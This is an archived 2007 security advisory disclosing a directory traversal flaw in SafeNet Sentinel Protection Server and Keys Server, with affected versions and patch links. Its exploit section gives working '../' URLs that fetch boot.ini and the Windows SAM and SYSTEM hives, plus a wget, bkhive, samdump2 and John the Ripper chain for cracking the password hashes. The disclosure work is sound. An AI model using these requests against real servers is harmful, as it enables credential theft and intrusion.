AOH :: HP Unsorted S :: TB13587.HTM

SafeNet Sentinel Protection Server and Keys Server directory traversal



Directory Traversal in SafeNet Sentinel Protection Server and Keys Server
Directory Traversal in SafeNet Sentinel Protection Server and Keys Server




--tctmm6wHVGT/P6vA
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

SUMMARY
======
SafeNet Inc.'s Sentinel Protection Server and Sentinel Keys Server
products include web servers which are vulnerable to directory
traversal attacks. A remote attacker could exploit these
vulnerabilities to read arbitrary files with the permissions of the web
server, typically SYSTEM.

AFFECTED SOFTWARE
================
* Sentinel Protection Server 7.0.0 through 7.4.0 and possibly below
* Sentinel Keys Server 1.0.3 and possibly below

UNAFFECTED
=========
* Sentinel Protection Server 7.4.1
* Sentinel Keys Server 1.0.4

IMPACT
=====
A remote attacker could exploit this vulnerability to read sensitive
files on the affected system. Attractive targets include the SAM
registry hive which contains system password hashes.

DETAILS
======
Sentinel Protection Server and Sentinel Keys Server run web servers on
ports 6002 and 7002, respectively, to allow remote monitoring of key
use. The web server software does not santize request paths correctly
before using them in system calls. As a result, an attacker can request
files outside the web server's directory root by using the ../ notation
to refer to the parent directory of the current directory.

SOLUTION
=======
Upgrade to Sentinel Protection Server 7.4.1 and Sentinel Keys Server
1.0.4.

First upgrade the Sentinel Driver software to 7.4.0 if you are using an
earlier version.

http://safenet-inc.com/support/files/Sentinel_Protection_Installer_7.4.0.zip 

Then install "Security Patch to Sentinel Protection Installer 7.4.0"

http://safenet-inc.com/support/files/SPI740SecurityPatch.zip 

EXPLOIT
======
Most popular web browsers are not be able to display URLs exploiting
this problem. I recommend using wget or lynx instead.

Substitute port 7002 to target Keys Server instead of Protection
Server.

This example will retrieve the C:\boot.ini file.

http://XX.XX.XX.XX:6002/../../../../../../boot.ini 

This example will retrieve a copy of the target system's SAM registry
hive from the Windows repair folder:

http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam 

With the SAM and SYSTEM registry hives, it is possible to extract the
system's local password hashes for offline cracking. For example, using the
bkhive, samdump2, and John the Ripper tools:

$ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/sam 
$ wget -q http://XX.XX.XX.XX:6002/../../../../../../winnt/repair/system 
$ bkhive system keyfile
$ samdump2 sam keyfile > hashes
$ john --wordlist=all hashes

http://ophcrack.sourceforge.net/bkhive.php 
http://www.openwall.com/john/ 

ACKNOWLEDGMENTS
==============
Thanks to SafeNet for patching this vulnerability and for working with
me on this advisory.

According to Digital Defense, Inc.'s advisory, Corey Lebleu originally
discovered this problem on October 10th, 2007. I discovered the same
vulnerability independently on October 29th, 2007. I have no reason to
doubt Digital Defense, Inc.'s claim, and do not claim to have
discovered the problem first.

REVISION HISTORY
===============
2007-11-26  original release

-- 
Elliot Kendall  
Network Security Architect
Brandeis University

Trouble replying? See http://people.brandeis.edu/~ekendall/sign/ 

--tctmm6wHVGT/P6vA
Content-Type: application/x-pkcs7-signature
Content-Disposition: attachment; filename="smime.p7s"
Content-Transfer-Encoding: base64

MIIItAYJKoZIhvcNAQcCoIIIpTCCCKECAQExCzAJBgUrDgMCGgUAMAsGCSqGSIb3DQEHAaCC
BiswggLkMIICTaADAgECAhAiAHapQpDn6ywD+hirb40QMA0GCSqGSIb3DQEBBQUAMGIxCzAJ
BgNVBAYTAlpBMSUwIwYDVQQKExxUaGF3dGUgQ29uc3VsdGluZyAoUHR5KSBMdGQuMSwwKgYD
VQQDEyNUaGF3dGUgUGVyc29uYWwgRnJlZW1haWwgSXNzdWluZyBDQTAeFw0wNzExMjYxNDQ2
NTNaFw0wODExMjUxNDQ2NTNaMEcxHzAdBgNVBAMTFlRoYXd0ZSBGcmVlbWFpbCBNZW1iZXIx
JDAiBgkqhkiG9w0BCQEWFWVrZW5kYWxsQGJyYW5kZWlzLmVkdTCCASIwDQYJKoZIhvcNAQEB
BQADggEPADCCAQoCggEBAOLbQr8WGPq3p8lBtHYFqtHBmIPEauPgBVBsCXT7yUtXo8fMnB1b
dm542xhR11q+E2lw1kY9bZIC9OO8Qa3bWDWG9O0qIH0tJOGxhLQend4IaXHxNgxTHgvx2P+o
xRMuh/1fnK0i4mnGsNBITx4QQPBPn2aSLa0VB6bJ9WjleI2/0s1J2Eq//xDa/64KaSVrKjtF
osqMaazlg8GnWscAhBVD9GzQJT15325u3YGuNXXjWq5m3rbAu9ZADKTBNIwQohu5dK7gTots
TkhaNsbpVl34ZMnujCTgDC6sXWivnQd7h6Vo3A8TjiBwCj4T+p4wnCdB283Epf7gT3o8s6Bq
E+cCAwEAAaMyMDAwIAYDVR0RBBkwF4EVZWtlbmRhbGxAYnJhbmRlaXMuZWR1MAwGA1UdEwEB
/wQCMAAwDQYJKoZIhvcNAQEFBQADgYEAc2W8gGWJCSectclP30xoBQ3PBsLL4Tkh7wo1Fxyq
v/FNlVLED/rN8xrH5lrGKqNHcp/zVzBFkJ0AR61dsgalf51aEwtgT6UhWIbI747wEAlyMwsM
prDiqzgXexhiUK7YeQJMcQ70NMCwbsJdBZBihNaqA4aUrUyO38lXbQ5EM1MwggM/MIICqKAD
AgECAgENMA0GCSqGSIb3DQEBBQUAMIHRMQswCQYDVQQGEwJaQTEVMBMGA1UECBMMV2VzdGVy
biBDYXBlMRIwEAYDVQQHEwlDYXBlIFRvd24xGjAYBgNVBAoTEVRoYXd0ZSBDb25zdWx0aW5n
MSgwJgYDVQQLEx9DZXJ0aWZpY2F0aW9uIFNlcnZpY2VzIERpdmlzaW9uMSQwIgYDVQQDExtU
aGF3dGUgUGVyc29uYWwgRnJlZW1haWwgQ0ExKzApBgkqhkiG9w0BCQEWHHBlcnNvbmFsLWZy
ZWVtYWlsQHRoYXd0ZS5jb20wHhcNMDMwNzE3MDAwMDAwWhcNMTMwNzE2MjM1OTU5WjBiMQsw
CQYDVQQGEwJaQTElMCMGA1UEChMcVGhhd3RlIENvbnN1bHRpbmcgKFB0eSkgTHRkLjEsMCoG
A1UEAxMjVGhhd3RlIFBlcnNvbmFsIEZyZWVtYWlsIElzc3VpbmcgQ0EwgZ8wDQYJKoZIhvcN
AQEBBQADgY0AMIGJAoGBAMSmPFVzVftOucqZWh5owHUEcJ3f6f+jHuy9zfVb8hp2vX8MOmHy
v1HOAdTlUAow1wJjWiyJFXCO3cnwK4Vaqj9xVsuvPAsH5/EfkTYkKhPPK9Xzgnc9A74r/rsY
Pge/QIACZNenprufZdHFKlSFD0gEf6e20TxhBEAeZBlyYLf7AgMBAAGjgZQwgZEwEgYDVR0T
AQH/BAgwBgEB/wIBADBDBgNVHR8EPDA6MDigNqA0hjJodHRwOi8vY3JsLnRoYXd0ZS5jb20v
VGhhd3RlUGVyc29uYWxGcmVlbWFpbENBLmNybDALBgNVHQ8EBAMCAQYwKQYDVR0RBCIwIKQe
MBwxGjAYBgNVBAMTEVByaXZhdGVMYWJlbDItMTM4MA0GCSqGSIb3DQEBBQUAA4GBAEiM0VCD
6gsuzA2jZqxnD3+vrL7CF6FDlpSdf0whuPg2H6otnzYvwPQcUCCTcDz9reFhYsPZOhl+hLGZ
GwDFGguCdJ4lUJRix9sncVcljd2pnDmOjCBPZV+V2vf3h9bGCE6u9uo05RAaWzVNd+NWIXiC
3CEZNd4ksdMdRv9dX2VPMYICUTCCAk0CAQEwdjBiMQswCQYDVQQGEwJaQTElMCMGA1UEChMc
VGhhd3RlIENvbnN1bHRpbmcgKFB0eSkgTHRkLjEsMCoGA1UEAxMjVGhhd3RlIFBlcnNvbmFs
IEZyZWVtYWlsIElzc3VpbmcgQ0ECECIAdqlCkOfrLAP6GKtvjRAwCQYFKw4DAhoFAKCBsTAY
BgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwGCSqGSIb3DQEJBTEPFw0wNzExMjYyMTA2MTFa
MCMGCSqGSIb3DQEJBDEWBBSgSGOlB3YTtJPKEuSWUfMazfsMGDBSBgkqhkiG9w0BCQ8xRTBD
MAoGCCqGSIb3DQMHMA4GCCqGSIb3DQMCAgIAgDANBggqhkiG9w0DAgIBQDAHBgUrDgMCBzAN
BggqhkiG9w0DAgIBKDANBgkqhkiG9w0BAQEFAASCAQDex0YRJHYkWzOcctvah1Ksrpc/Ai2E
SZVvHPMaIuFpgmu2NDU16ilYodSBgzQ4ac9a8ihyTe4NERu7XLyqREklGqdPCX3mw8leGnug
lEyY9CQda+zxdG55mQU4JTr78atexueMf2AVeGDqR1KLd8TLfEYALeWlC0WnZOdx+P0kAyjV
oFQrL8pQ/1AP6GGpzaHa5yIwDn16ewtMACunxaQOWKsEA7xP4ODHSGcXtPIvQkMbsPDaub0L
oDaPCnv9OfCNZoiIKDHiNgQqu1U/E0fqSrp6S5L8wfz8IvUB/cqFyo3pN9yRh49cppqFtfqt
71LYdmcd3lWOZtJ0oeVmyQ+Z

--tctmm6wHVGT/P6vA--

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.